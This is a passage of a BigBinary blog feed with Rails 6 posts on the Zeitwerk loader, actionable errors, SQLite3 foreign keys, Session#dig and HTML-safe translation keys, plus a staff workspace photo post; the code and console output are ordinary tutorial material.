      <content type="html"><![CDATA[<p><a href="https://github.com/fxn/zeitwerk">Zeitwerk</a> is the new code loader that <a href="https://weblog.rubyonrails.org/2019/2/22/zeitwerk-integration-in-rails-6-beta-2#autoloading-modes">comes with Rails 6 by default</a>. In addition to providing <a href="https://guides.rubyonrails.org/autoloading_and_reloading_constants.html">autoloading, eager loading, and reloading capabilities</a>, it also improves on the classical code loader by being efficient and thread safe. According to the author of Zeitwerk, <a href="https://twitter.com/fxn">Xavier Noria</a>, one of the main motivations for writing Zeitwerk was to keep code DRY and to remove the brittle <code>require</code> calls.</p><p>Zeitwerk is available as a gem with no additional dependencies. This means any regular Ruby project can use Zeitwerk.</p><h3>How to use Zeitwerk</h3><p>Zeitwerk is baked into a Rails 6 project, thanks to the <a href="https://github.com/rails/rails/blob/bfc9065d58508fb19dd1a4170406604dd3b3234a/activesupport/lib/active_support/dependencies/zeitwerk_integration.rb">Zeitwerk-Rails integration</a>. For a non-Rails project, adding the following to the project's entry point sets up Zeitwerk.</p><pre><code class="language-ruby">loader = Zeitwerk::Loader.new
loader.push_dir(...)
loader.setup</code></pre><p>For gem maintainers, Zeitwerk provides the handy <code>.for_gem</code> utility method.</p><p>The following example from the Zeitwerk documentation illustrates the usage of the <code>Zeitwerk::Loader.for_gem</code> method.</p><pre><code class="language-ruby"># lib/my_gem.rb (main file)
require &quot;zeitwerk&quot;
loader = Zeitwerk::Loader.for_gem
loader.setup

module MyGem
  # Since the setup has been performed, at this point we are already
  # able to reference project constants, in this case MyGem::MyLogger.
  include MyLogger
end</code></pre><h3>How does Zeitwerk work?</h3><p>Before we look into Zeitwerk's internals, the following section provides a quick refresher on constant resolution in Ruby and how the classical code loader of Rails works.</p><p>Ruby's constant resolution looks for a constant in the following places.</p><ul><li>In each entry of Module.nesting</li><li>In each entry of Module.ancestors</li></ul><p>It triggers the <code>const_missing</code> callback when it can't find the constant.</p><p>Ruby used to look for constants in Object.ancestors as well, but <a href="https://github.com/ruby/ruby/commit/44a2576f798b07139adde2d279e48fdbe71a0148">that no longer seems to be the case</a>. An in-depth explanation of constant resolution can be found <a href="https://cirw.in/blog/constant-lookup.html">at Conrad Irwin's blog</a>.</p><h5>Classical Code Loader in Rails</h5><p>The classical code loader (the code loader in Rails versions &lt; 6.0) achieves autoloading by overriding <a href="https://docs.ruby-lang.org/en/2.5.0/Module.html#method-i-const_missing">Module#const_missing</a> and loads the missing constant without the need for an explicit require call, as long as the code follows certain conventions.</p><ul><li>The file should be within a directory in ActiveSupport::Dependencies.autoload_paths</li><li>A file should be named after the class, i.e. Admin::RoutesController =&gt; admin/routes_controller.rb</li></ul><h5>Zeitwerk Mode</h5><p>Zeitwerk takes an entirely different approach to autoloading by registering constants to be autoloaded by Ruby.</p><p>Consider the following configuration, in which Zeitwerk manages the <code>lib</code> directory and <code>lib</code> has an <code>automobile.rb</code> file.</p><pre><code class="language-ruby">loader.push_dir('./lib')</code></pre><p>Zeitwerk then uses <a href="https://docs.ruby-lang.org/en/2.5.0/Module.html#method-i-autoload">Module.autoload</a> to tell Ruby that &quot;Automobile&quot; can be found in &quot;lib/automobile.rb&quot;.</p><pre><code 
class="language-ruby">autoload &quot;Automobile&quot;, &quot;lib/automobile.rb&quot;</code></pre><p>Unlike the classical loader, Zeitwerk takes module nesting into account while loading constants, by leveraging the TracePoint API to go look for constants defined in subdirectories when a new class or module is defined.</p><p>Let us look at an example to understand this better.</p><pre><code class="language-ruby">class Automobile
  # =&gt; Tracepoint hook triggers here.
  # include Engine
end</code></pre><p>When <a href="https://github.com/fxn/zeitwerk/blob/86064aba0c6e218c8bcc235b30c210a86c7c6ef8/lib/zeitwerk/explicit_namespace.rb#L78">the tracepoint hook</a> triggers, Zeitwerk checks for an <code>automobile</code> directory at the same level as automobile.rb and sets up Module.autoload for that directory and all the files (in this case ./automobile/engine.rb) within that directory.</p><h3>Conclusion</h3><p>Previously in Rails, we had a code loader that was riddled with gotchas and struggled to be thread safe. Zeitwerk does a better job by leveraging Ruby's standard API and matching Ruby's semantics for constants.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveSupport::ActionableError]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-active-support-actionable-error"/>
      <updated>2019-10-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-active-support-actionable-error</id>
      <content type="html"><![CDATA[<p>When working in a team on a Rails application, we often bump into <code>PendingMigrationError</code> or other errors that require us to run a Rails command, a rake task, etc.</p><p>Rails introduced a way to resolve such frequent errors in development from the error page itself.</p><p>Rails 6 added the <a href="https://github.com/rails/rails/pull/34788"><code>ActiveSupport::ActionableError</code></a> module to define actions we want to perform on errors, right from the error page.</p><p>For example, this is how the <code>PendingMigrationError</code> page looks in Rails 6.</p><p><img src="/blog_images/2019/rails-6-adds-active-support-actionable-error/rails-6.png" alt="How Actionable error looks like in Rails 6"></p><p>By default, a button is added on the error screen that says <em>Run pending migrations</em>. Clicking on this button dispatches the <code>rails db:migrate</code> action. The page reloads once migrations run successfully.</p><p>We can also define custom actions to execute on errors.</p><h3>How to define actions on error?</h3><p>We need to include the <code>ActiveSupport::ActionableError</code> module in our error class. We can monkey patch an existing error class or define a custom error class.</p><p>The <code>#action</code> API is provided to define actions on an error. The first argument to <code>#action</code> is the name of the action. This string is displayed on the button on the error page. The second argument is a block where we can write commands or code to fix the error.</p><p>Let's take an example of seeding posts data from the controller, if posts are not already present.</p><pre><code class="language-ruby"># app/controllers/posts_controller.rb
class PostsController &lt; ApplicationController
  def index
    @posts = Post.all
    if @posts.empty?
      raise PostsMissingError
    end
  end
end</code></pre><pre><code class="language-ruby"># app/errors/posts_missing_error.rb
class PostsMissingError &lt; StandardError
  include ActiveSupport::ActionableError

  action &quot;seed posts data&quot; do
    Rails::Command.invoke 'posts:seed'
  end
end</code></pre><pre><code class="language-ruby"># lib/tasks/posts.rake
namespace :posts do
  desc 'posts seed task'
  task :seed do
    Post.create(title: 'First Post')
  end
end</code></pre><pre><code class="language-ruby"># app/views/posts/index.html.erb
&lt;% @posts.each do |post| %&gt;
  &lt;%= post.title %&gt;
&lt;% end %&gt;</code></pre><p>Let's check <code>/posts</code> (the <code>posts#index</code> action) when no posts are present. We would get an error page with an action button on it, as shown below.</p><p><img src="/blog_images/2019/rails-6-adds-active-support-actionable-error/posts-missing-error.png" alt="Actionable error - seed posts data"></p><p>Clicking on the <em>seed posts data</em> action button will run our rake task and create posts. Rails will automatically reload <code>/posts</code> after running the rake task.</p><p><img src="/blog_images/2019/rails-6-adds-active-support-actionable-error/posts-index.png" alt="Posts index page"></p><p>The <a href="https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/actionable_exceptions.rb"><code>ActionDispatch::ActionableExceptions</code></a> middleware takes care of invoking actions from the error page. The <code>ActionableExceptions</code> middleware dispatches the action to <code>ActionableError</code> and redirects back when the action block has run successfully. 
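</p><p>The dispatch flow described above can be sketched in plain Ruby. This is a simplified illustration of the idea, not Rails' actual implementation; <code>ActionableErrorSketch</code>, <code>PendingSeedError</code> and <code>dispatch_action</code> are hypothetical names:</p>

```ruby
# A minimal sketch of the ActionableError idea: an including error class
# registers named actions, and a dispatcher looks an action up by name
# (the name shown on the error-page button) and runs its block.
module ActionableErrorSketch
  def self.included(base)
    base.extend(ClassMethods)
  end

  module ClassMethods
    # Registered actions for this error class: name => block.
    def actions
      @actions ||= {}
    end

    # Register a named action whose block fixes the error.
    def action(name, &block)
      actions[name] = block
    end
  end
end

class PendingSeedError < StandardError
  include ActionableErrorSketch

  action "seed posts data" do
    # In Rails this block would run a command or rake task.
    :seeded
  end
end

# Plays the role of the ActionableExceptions middleware: invoke the
# action the user clicked, identified by its name.
def dispatch_action(error_class, name)
  error_class.actions.fetch(name).call
end

dispatch_action(PendingSeedError, "seed posts data") # => :seeded
```

<p>Rails' real middleware additionally redirects back to the originating page after the block runs, which this sketch omits. 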
Action buttons are added on the error page from <a href="https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/templates/rescues/_actions.html.erb">this middleware template</a>.</p><p>Check out the <a href="https://github.com/rails/rails/pull/34788">pull request</a> for more information on actionable errors.</p>]]></content>
    </entry><entry>
       <title><![CDATA[This is how our workspace looks like]]></title>
       <author><name>Rishi Mohan</name></author>
      <link href="https://www.bigbinary.com/blog/this-is-how-our-workspace-looks-like"/>
      <updated>2019-09-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/this-is-how-our-workspace-looks-like</id>
      <content type="html"><![CDATA[<p>BigBinary has been remote and flexible since the start, and it's one of the best things a company can offer. You don't need to spend hours commuting, and you can work when you feel productive. Working remotely also means that you have the flexibility of working from Starbucks, from a library or from your home. You can set up your own workspace at home and still have an office-like feeling.</p><p>We recently got a chance to see the workspaces of our colleagues. Everyone shared photos of the environments they work in on Slack, and it was fun seeing everyone's desk and setup. We thought it would be fun to share a peek at the home offices we have. Here we go.</p><h2>Akhil Gautam</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpeg" alt="BigBinary Remote Workspace"></p><h2>Amit Choudhary</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Chimed Palden</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Chirag Shah</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_1.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_2.jpg" alt="BigBinary Remote Workspace"></p><h2>Ershad Kunnakkadan</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpeg" alt="BigBinary Remote Workspace"></p><h2>Mohit Natoo</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Navaneeth PK</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_1.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_2.png" alt="BigBinary Remote Workspace"></p><h2>Neeraj Singh</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_1.jpg" 
alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_2.jpg" alt="BigBinary Remote Workspace"></p><h2>Nitin Kalasannavar</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Paras Bansal</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Pranav Raj</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Prathamesh Sonpatki</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Rahul Mahale</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Rishi Mohan</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_1.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_2.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_3.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_4.jpg" alt="BigBinary Remote Workspace"><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup_5.jpg" alt="BigBinary Remote Workspace"></p><h2>Shibin Madassery</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Sony Mathew</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Sunil Kumar</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Tyler and Naiara</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Unnikrishnan 
KP</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p><h2>Vishal Telangre</h2><p><img src="/blog_images/2019/this-is-how-our-workspace-looks-like/setup.jpg" alt="BigBinary Remote Workspace"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 add_foreign_key & remove_foreign_key SQLite3]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-add_foreign_key-and-remove_foreign_key-for-sqlite3"/>
      <updated>2019-09-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-add_foreign_key-and-remove_foreign_key-for-sqlite3</id>
      <content type="html"><![CDATA[<p>Rails provides<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>to add foreign key constraint for a column on a table.</p><p>It also provides<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>to remove the foreign key constraint.</p><p>Before Rails 6,<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>and<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>were not supported for SQLite3.</p><p>Rails 6 now adds this support. Now, we can create and remove foreign keyconstraints using<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>and<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>in SQLite3.</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><p>We have two tables named as <code>orders</code> and <code>users</code>. 
Now, let's add foreign keyconstraint of <code>users</code> in <code>orders</code> table using<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>and then try removing it using<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>.</p><pre><code class="language-ruby">&gt;&gt; class AddUserReferenceToOrders &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     add_column :orders, :user_id, :integer&gt;&gt;     add_foreign_key :orders, :users&gt;&gt;   end&gt;&gt; end=&gt; :change&gt;&gt; AddUserReferenceToOrders.new.change-- add_column(:orders, :user_id, :integer)   (1.2ms)  ALTER TABLE &quot;orders&quot; ADD &quot;user_id&quot; integer   -&gt; 0.0058s-- add_foreign_key(:orders, :users)   -&gt; 0.0000s=&gt; nil&gt;&gt; class RemoveUserForeignKeyFromOrders &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     remove_foreign_key :orders, :users&gt;&gt;   end&gt;&gt; end=&gt; :change&gt;&gt; RemoveUserForeignKeyFromOrders.new.change-- remove_foreign_key(:orders, :users)   -&gt; 0.0001s=&gt; nil</code></pre><p>We can see that<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>and<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>are ignored by <code>Rails 5.2</code> with SQLite3.</p><h4>Rails 6.0.0.rc1</h4><p>We have two tables named as <code>orders</code> and <code>users</code>. 
Now, let's add foreign keyconstraint of <code>users</code> in <code>orders</code> table using<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>.</p><pre><code class="language-ruby">&gt;&gt; class AddUserReferenceToOrders &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     add_column :orders, :user_id, :integer&gt;&gt;     add_foreign_key :orders, :users&gt;&gt;   end&gt;&gt; end=&gt; :change&gt;&gt; AddUserReferenceToOrders.new.change-- add_column(:orders, :user_id, :integer)   (1.0ms)  SELECT sqlite_version(*)   (2.9ms)  ALTER TABLE &quot;orders&quot; ADD &quot;user_id&quot; integer   -&gt; 0.0091s-- add_foreign_key(:orders, :users)   (0.0ms)  begin transaction   (0.1ms)  PRAGMA foreign_keys   (0.1ms)  PRAGMA defer_foreign_keys   (0.0ms)  PRAGMA defer_foreign_keys = ON   (0.1ms)  PRAGMA foreign_keys = OFF   (0.2ms)  CREATE TEMPORARY TABLE &quot;aorders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; datetime(6) NOT NULL, &quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL)   (0.1ms)  INSERT INTO &quot;aorders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;orders&quot;   (0.3ms)  DROP TABLE &quot;orders&quot;   (0.1ms)  CREATE TABLE &quot;orders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; datetime(6) NOT NULL, 
&quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL, CONSTRAINT &quot;fk_rails_f868b47f6a&quot;FOREIGN KEY (&quot;user_id&quot;)  REFERENCES &quot;users&quot; (&quot;id&quot;))   (0.1ms)  INSERT INTO &quot;orders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;aorders&quot;   (0.1ms)  DROP TABLE &quot;aorders&quot;   (0.0ms)  PRAGMA defer_foreign_keys = 0   (0.0ms)  PRAGMA foreign_keys = 1   (0.6ms)  commit transaction   -&gt; 0.0083s=&gt; []&gt;&gt; class RemoveUserForeignKeyFromOrders &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     remove_foreign_key :orders, :users&gt;&gt;   end&gt;&gt; end=&gt; :change&gt;&gt; RemoveUserForeignKeyFromOrders.new.change-- remove_foreign_key(:orders, :users)   (1.4ms)  SELECT sqlite_version(*)   (0.0ms)  begin transaction   (0.0ms)  PRAGMA foreign_keys   (0.0ms)  PRAGMA defer_foreign_keys   (0.0ms)  PRAGMA defer_foreign_keys = ON   (0.0ms)  PRAGMA foreign_keys = OFF   (0.2ms)  CREATE TEMPORARY TABLE &quot;aorders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; datetime(6) NOT NULL, &quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL)   (0.3ms)  INSERT INTO &quot;aorders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;orders&quot;   
(0.4ms)  DROP TABLE &quot;orders&quot;   (0.1ms)  CREATE TABLE &quot;orders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; datetime(6) NOT NULL, &quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL)   (0.1ms)  INSERT INTO &quot;orders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;aorders&quot;   (0.1ms)  DROP TABLE &quot;aorders&quot;   (0.0ms)  PRAGMA defer_foreign_keys = 0   (0.0ms)  PRAGMA foreign_keys = 1   (0.7ms)  commit transaction   -&gt; 0.0179s=&gt; []</code></pre><p>Now, let's remove foreign key constraint of <code>users</code> from <code>orders</code> table using<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>.</p><pre><code class="language-ruby">&gt;&gt; class RemoveUserForeignKeyFromOrders &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     remove_foreign_key :orders, :users&gt;&gt;   end&gt;&gt; end=&gt; :change&gt;&gt; RemoveUserForeignKeyFromOrders.new.change-- remove_foreign_key(:orders, :users)   (1.4ms)  SELECT sqlite_version(*)   (0.0ms)  begin transaction   (0.0ms)  PRAGMA foreign_keys   (0.0ms)  PRAGMA defer_foreign_keys   (0.0ms)  PRAGMA defer_foreign_keys = ON   (0.0ms)  PRAGMA foreign_keys = OFF   (0.2ms)  CREATE TEMPORARY TABLE &quot;aorders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; 
datetime(6) NOT NULL, &quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL)   (0.3ms)  INSERT INTO &quot;aorders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;orders&quot;   (0.4ms)  DROP TABLE &quot;orders&quot;   (0.1ms)  CREATE TABLE &quot;orders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; datetime(6) NOT NULL, &quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL)   (0.1ms)  INSERT INTO &quot;orders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;aorders&quot;   (0.1ms)  DROP TABLE &quot;aorders&quot;   (0.0ms)  PRAGMA defer_foreign_keys = 0   (0.0ms)  PRAGMA foreign_keys = 1   (0.7ms)  commit transaction   -&gt; 0.0179s=&gt; []</code></pre><p>We can see here that with Rails 6, <a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a> and <a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a> work as expected, adding and removing the foreign key constraint respectively.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/35212">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActionDispatch::Request::Session#dig]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-actiondispatch-request-session-dig"/>
      <updated>2019-09-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-actiondispatch-request-session-dig</id>
      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/32446">ActionDispatch::Request::Session#dig</a>.</p><p>This works the same way as <code>Hash#dig</code>.</p><p>It extracts the nested value specified by the sequence of keys.</p><p><code>Hash#dig</code> was introduced in <code>Ruby 2.3</code>.</p><p>Before Rails 6, we could achieve the same thing by first converting the session to a hash and then calling <code>Hash#dig</code> on it.</p><p>Let's check out how it works.</p><h4>Rails 5.2</h4><p>Let's add some user information in the session and use <code>dig</code> after converting it to a hash.</p><pre><code class="language-ruby">&gt;&gt; session[:user] = { email: 'jon@bigbinary.com', name: { first: 'Jon', last: 'Snow' } }
=&gt; {:email=&gt;&quot;jon@bigbinary.com&quot;, :name=&gt;{:first=&gt;&quot;Jon&quot;, :last=&gt;&quot;Snow&quot;}}

&gt;&gt; session.to_hash
=&gt; {&quot;session_id&quot;=&gt;&quot;5fe8cc73c822361e53e2b161dcd20e47&quot;, &quot;_csrf_token&quot;=&gt;&quot;gyFd5nEEkFvWTnl6XeVbJ7qehgL923hJt8PyHVCH/DA=&quot;, &quot;return_to&quot;=&gt;&quot;http://localhost:3000&quot;, &quot;user&quot;=&gt;{:email=&gt;&quot;jon@bigbinary.com&quot;, :name=&gt;{:first=&gt;&quot;Jon&quot;, :last=&gt;&quot;Snow&quot;}}}

&gt;&gt; session.to_hash.dig(&quot;user&quot;, :name, :first)
=&gt; &quot;Jon&quot;</code></pre><h4>Rails 6.0.0.rc1</h4><p>Let's add the same information to the session and now use <code>dig</code> on the session object without converting it to a hash.</p><pre><code class="language-ruby">&gt;&gt; session[:user] = { email: 'jon@bigbinary.com', name: { first: 'Jon', last: 'Snow' } }
=&gt; {:email=&gt;&quot;jon@bigbinary.com&quot;, :name=&gt;{:first=&gt;&quot;Jon&quot;, :last=&gt;&quot;Snow&quot;}}

&gt;&gt; session.dig(:user, :name, :first)
=&gt; &quot;Jon&quot;</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/32446">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Marking arrays of translations HTML safe using the _html suffix]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix"/>
      <updated>2019-09-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix</id>
      <content type="html"><![CDATA[<h3>Before Rails 6</h3><p>Before Rails 6, keys with the <code>_html</code> suffix in the language locale files are automatically marked as HTML safe. These HTML safe keys do not get escaped when used in the views.</p><pre><code class="language-yaml"># config/locales/en.yml
en:
  home:
    index:
      title_html: &lt;h2&gt;We build web &amp; mobile applications&lt;/h2&gt;
      description_html:
        We are a dynamic team of &lt;em&gt;developers&lt;/em&gt; and &lt;em&gt;designers&lt;/em&gt;.
      sections:
        blogs:
          title_html: &lt;h3&gt;Blogs &amp; publications&lt;/h3&gt;
          description_html:
            We regularly write our blog. Our blogs are covered by &lt;strong&gt;Ruby
            Inside&lt;/strong&gt; and &lt;strong&gt;Ruby Weekly Newsletter&lt;/strong&gt;.</code></pre><pre><code class="language-erb">&lt;!-- app/views/home/index.html.erb --&gt;
&lt;%= t('.title_html') %&gt;
&lt;%= t('.description_html') %&gt;
&lt;%= t('.sections.blogs.title_html') %&gt;
&lt;%= t('.sections.blogs.description_html') %&gt;</code></pre><p>Once rendered, this page looks like this.</p><p><img src="/blog_images/2019/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix/before-rails-6-i18n-_html-suffix-without-array-key.png" alt="before-rails-6"></p><p>This way of marking translations as HTML safe by adding the <code>_html</code> suffix to the keys does not work as expected when the value is an array.</p><pre><code class="language-yaml"># config/locales/en.yml
en:
  home:
    index:
      title_html: &lt;h2&gt;We build web &amp; mobile applications&lt;/h2&gt;
      description_html: We are a dynamic team of &lt;em&gt;developers&lt;/em&gt; and &lt;em&gt;designers&lt;/em&gt;.
      sections:
        blogs:
          title_html: &lt;h3&gt;Blogs &amp; publications&lt;/h3&gt;
          description_html: We regularly write our blog. Our blogs are covered by &lt;strong&gt;Ruby Inside&lt;/strong&gt; and &lt;strong&gt;Ruby Weekly Newsletter&lt;/strong&gt;.
        services:
          title_html: &lt;h3&gt;Services we offer&lt;/h3&gt;
          list_html:
            - &lt;strong&gt;Ruby on Rails&lt;/strong&gt;
            - React.js &amp;#9883;
